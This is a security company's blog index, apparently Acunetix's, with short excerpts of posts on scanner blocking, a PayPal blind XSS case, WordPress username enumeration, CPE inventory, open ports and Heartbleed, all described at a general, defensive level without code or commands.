How to Block Automated Scanners from Scanning your Site

This blog post describes how to block automated scanners from scanning your website. This should work with any modern web scanner parsing robots.txt (all popular web scanners do this). Website owners use the robots.txt file to give instructions about their site to web robots, such as Google’s indexing bot. The /robots.txt file is a text file, with one or more records, […]

Read More →

AcuMonitor could have Detected PayPal’s Blind XSS Vulnerability

Vulnerability-Lab, a Germany-based security research company, recently identified an application-side validation web vulnerability, which allows an attacker to inject code in his user profile. The injected code gets executed when a PayPal employee loads the user’s details on PayPal’s backend system. This type of vulnerability is better known as Blind Cross-Site Scripting (Blind XSS) vulnerability […]

Read More →

WordPress Username Enumeration using HTTP Fuzzer

In many WordPress blogs, it’s possible to enumerate WordPress users using a well-known feature/bug related to author archives. This works if the following conditions are met: WordPress permalinks are enabled. By default WordPress uses web URLs which have question marks and lots of numbers in them; however, WordPress offers the ability to create a custom URL structure for your […]

Read More →

Common Platform Enumeration (CPE) Explained

When running a Network Scan on your perimeter server using Acunetix Online Vulnerability Scanner (OVS), one of the Informational alerts shown in the scan results is the CPE Inventory. The data that is collected during the scan is aggregated using the CPE standard, originally defined by MITRE, and is maintained by the U.S. National Institute […]

Read More →

Cookie Overdose

One of our customers recently reported that some parts of his site were not properly crawled by our scanner (Acunetix Web Vulnerability Scanner). Upon investigation, I found the cause of the problem. When a specific page was visited, a cookie with a random name and a large value was set. This page had many parameters and the crawler had […]

Read More →

Network Vulnerability Assessment Gotchas to Avoid

There’s a saying that experience is something you don’t get until just after you need it. It’s so true, especially in the context of information security and, specifically, network security testing. If you have any experience running vulnerability scans, you’ve no doubt been down that road with me. You know, the one where you scan […]

Read More →

How to Close Unused Open Ports

One of the checks done in a network scan by Acunetix Online Vulnerability Scanner (OVS) is a TCP and UDP port scan. Any open ports detected during the scan will be reported as shown in the screenshot. In this particular scan, these ports have been detected as being open on the server: 80, 1027, 135, […]

Read More →

Heartbleed – A Bigger Threat Than Meets the Eye

The Heartbleed Bug took the world by storm the moment the vulnerability became public. Heartbleed Bug is a serious vulnerability in the widely used OpenSSL cryptographic library. This weakness allows theft of data resident in the server’s memory, which generally comprises SSL/TLS encrypted information, including the server’s SSL private keys. According to Netcraft’s April 2014 […]

Read More →